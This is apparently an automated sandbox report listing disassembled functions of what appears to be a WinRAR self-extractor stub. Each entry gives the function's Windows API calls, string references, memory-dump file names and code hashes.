AcquireSRWLockExclusive, xrefs: 00007FF741EC163E
ReleaseSRWLockExclusive, xrefs: 00007FF741EC1653
KERNEL32.DLL, xrefs: 00007FF741EC1624

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction ID: bdb2af7c78a56be480553086c3a77e6e1b3f7bcbac31d5408bde7ded33c973ae
Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction Fuzzy Hash: A3111828B4DB23D2EF56BB10A940274A2917F08792FCC4435CA2D0A394FFBDA445C620

Function 00007FF741EAED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF741EA51A4: GetVersionExW.KERNEL32 ref: 00007FF741EA51D5

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAED8C
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAED98
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEDA8
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEDB6
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEDC4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF741E95AB4), ref: 00007FF741EAEE05

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction ID: 3f7e2860edb1839e9f0c01c545c2bc4970535fadaa668d58682124515e8e2915
Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction Fuzzy Hash: 3B519BB6B04622CAEB04EFA8D4404AC77B1F748B89BA4803ADE1D57B58DB78E542C750

Function 00007FF741EAF010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF741EAF074

Part of subcall function 00007FF741EA51A4: GetVersionExW.KERNEL32 ref: 00007FF741EA51D5

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF741EAF096
FileTimeToSystemTime.KERNEL32 ref: 00007FF741EAF0A2
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF741EAF0B2
SystemTimeToFileTime.KERNEL32 ref: 00007FF741EAF0C0
SystemTimeToFileTime.KERNEL32 ref: 00007FF741EAF0CE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction ID: adf2ffd149c390ec13910f47a69edda83e24c036cecf2aded63277ec064c27dc
Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction Fuzzy Hash: 2A317F66B04A52CDFB00EFB5D8801AC7370FF08749B94502ADE1D93A58EF78D485C310

Function 00007FF741EA7918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA7C8C

Strings

.rar, xrefs: 00007FF741EA7969, 00007FF741EA7978
sfx, xrefs: 00007FF741EA79F3, 00007FF741EA7A02
rar, xrefs: 00007FF741EA7A9B, 00007FF741EA7AAA, 00007FF741EA7B67, 00007FF741EA7B7C
exe, xrefs: 00007FF741EA79AF, 00007FF741EA79BE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
Instruction ID: 78491d58c7d1987c4e9227a1a516a444cd2ae0a157ec33f01778114cefd2b6c7
Opcode Fuzzy Hash: 2fc35cbdd70ebaba8229e08f8487c40f3259a53efddd90ef8447a9b59f22dcea
Instruction Fuzzy Hash: 7BA1B02AE1C626C0EB06FB25D8542B8A361BF45BD9F840231CE2D076E5DFBDE585C360

Function 00007FF741EC5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF741EC5D58

Part of subcall function 00007FF741EC5210: abort.LIBCMT ref: 00007FF741EC5223

_CallSETranslator.LIBVCRUNTIME ref: 00007FF741EC5DA3
abort.LIBCMT ref: 00007FF741EC5FD1

Strings

MOC, xrefs: 00007FF741EC5D6C
RCC, xrefs: 00007FF741EC5D74

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction ID: 4289694f1f271ddc464fb7e7d98700a8e66a0757bf18d634451d247f2a74ceb2
Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction Fuzzy Hash: 8791A177A08BA1CAE712FB65D8402ADBBB0FB04789F544129EE4C17755EF78D195CB00

Function 00007FF741EC4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF741EC4FAB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF741EC5040
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF741EC2F5E), ref: 00007FF741EC508F

Strings

csm, xrefs: 00007FF741EC5026
f, xrefs: 00007FF741EC4FBE

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction ID: 84fd4e6a13af180d7ae4e16df80385d091e3c9fb8d4ed01f232a75be68d08914
Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction Fuzzy Hash: D151A33AB1D622C6DB16FB15EC44A29B795FF80B85F908034DE1A47748EFB8E841C750

Function 00007FF741E9CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF741E9D03D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9D0D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741E9D0D7

Part of subcall function 00007FF741E9DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF741E9CF4B), ref: 00007FF741E9DE27
Part of subcall function 00007FF741E9DE04: GetLastError.KERNEL32 ref: 00007FF741E9DE88
Part of subcall function 00007FF741E9DE04: CloseHandle.KERNEL32 ref: 00007FF741E9DE9B

Strings

SeRestorePrivilege, xrefs: 00007FF741E9CF5E
SeSecurityPrivilege, xrefs: 00007FF741E9CF3F

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
Instruction ID: 279e2c3fa21b7184860ff4143170afb33ead13a7a2cd2a551ad89d281521f6d2
Opcode Fuzzy Hash: 6c1d5a5d5395298d9d74f6f4ee4569930d238c95dd33962f37e3fdaa32d53d1a
Instruction Fuzzy Hash: 4151D46AF1C762D5FB02FB61D8405B9A361BF867A5FC44130DE1D13696DEBCE485C220

Function 00007FF741EB7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF741EB7B6F
GetWindowRect.USER32 ref: 00007FF741EB7BC0
ShowWindow.USER32 ref: 00007FF741EB7C96
ShowWindow.USER32 ref: 00007FF741EB7CC3

Strings

RarHtmlClassName, xrefs: 00007FF741EB7C4B

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 2556132b3669e06fd82c4edcfb73ee53acbff31ec70f5bbfd324b20a510b6699
Instruction ID: bc2bf18a8feeebba5b7ff239a15dce303c8823c35bc40d1eb8e28c425b8bb10d
Opcode Fuzzy Hash: 2556132b3669e06fd82c4edcfb73ee53acbff31ec70f5bbfd324b20a510b6699
Instruction Fuzzy Hash: C551A329A0D752CAEB26FB25E44437AE361FB89B81F844134DE8E03B95DF7CE0418B10

Function 00007FF741EBFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF741EBFD43
SetEnvironmentVariableW.KERNEL32 ref: 00007FF741EBFDBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EBFE1B

Strings

sfxcmd, xrefs: 00007FF741EBFD3C
sfxpar, xrefs: 00007FF741EBFDB5

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
Instruction ID: a4b6b81efd863c1d0c53fd96057e12ab091b14b6fbe4760c14aec234e3de5a6d
Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
Instruction Fuzzy Hash: 92319435A18A26C4EB01FB65E8841BCB371FB84B99F940231DE6D177A9DFB8D041C354

Function 00007FF741EBFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00007FF741EBFF60
REPLACEFILEDLG, xrefs: 00007FF741EBFF34, 00007FF741EBFF99

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction ID: e74ef55112ac617a950c8d1aec52be18cb2872c7d0884eadc731505f0fc8c493
Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction Fuzzy Hash: 26211B29D0DB67E0FB12FB15A844174A3A0FB8AB8AFD40136D94D47360DEBCE1958360

Function 00007FF741ECBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF741ECBFD0
GetProcAddress.KERNEL32 ref: 00007FF741ECBFE6
FreeLibrary.KERNEL32 ref: 00007FF741ECC00B

Strings

mscoree.dll, xrefs: 00007FF741ECBFC7
CorExitProcess, xrefs: 00007FF741ECBFDF

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction ID: 57e74cf343bd08d11dbfa7e4034522ad81ce1d3fa4c1f1c075805c9b879fa281
Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction Fuzzy Hash: 67F0A429A1DA53C1EF46BB12E840679A3A0BF88B91F881039D96F43255DF7CE485C710

Function 00007FF741ED45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF741ED4605

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction ID: 12d11afe743c0751e8943e5f68528fcc3d21e701fc9190b92e4c57b1e0cd28c7
Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction Fuzzy Hash: 1881E52AF1C663C5F712BB25D8406BCE6A0BB65B8AF894131DD2E13A95DFBCD401C320

Function 00007FF741EA3AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF741EA3BBB
CreateFileW.KERNEL32 ref: 00007FF741EA3C24
SetFileTime.KERNEL32 ref: 00007FF741EA3CEC
CloseHandle.KERNEL32 ref: 00007FF741EA3CF6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF741EA3D2C

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
Instruction ID: 7cf92ca3c994d7362ab910f57b7c060355ea3f51b0cc90620aa997ac4354b10a
Opcode Fuzzy Hash: 14fdea18fdcf977c61dce6ecaccc8aa35300d093acc7d7c713630260d7cb0aba
Instruction Fuzzy Hash: ED51E32AB0CA12CAFB12FB65E9402BDA372BB447E9F844635DE1E466D4DF789445C320

Function 00007FF741ED3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF741ED4767), ref: 00007FF741ED3F91
WideCharToMultiByte.KERNEL32 ref: 00007FF741ED406D
WriteFile.KERNEL32 ref: 00007FF741ED4093
WriteFile.KERNEL32 ref: 00007FF741ED40D2
GetLastError.KERNEL32 ref: 00007FF741ED410A

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction ID: b750a9f499c66c651a395236c6da5c8f8dfaaf8538d8a5ece02cc058bb4aed90
Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction Fuzzy Hash: 5F51EF76B18A62C9E712FB35D8403ACBBB0BB54789F488135CE5A57A98DF78D046C320

Function 00007FF741EC1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF741EA4DF4), ref: 00007FF741EC1E87
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF741EA4DF4), ref: 00007FF741EC1F09
SysAllocString.OLEAUT32 ref: 00007FF741EC1F16

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
Instruction ID: 5fa7045dbd50b7ccb1587f1c98bfc29980e5573ba77c7082cfa3d7b3573b60e4
Opcode Fuzzy Hash: 8c2dc27bb1e4af113538b7172bb6dd323e96cb8c94470b0dbd49c9d6f404eed7
Instruction Fuzzy Hash: 4E41DB39A0D6A6C9E716BF219840378A291FF04BA5F944634EB6D877D5EFBDD041C320

Function 00007FF741ECF414 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF741ECF536

Memory Dump Source

Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true

Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
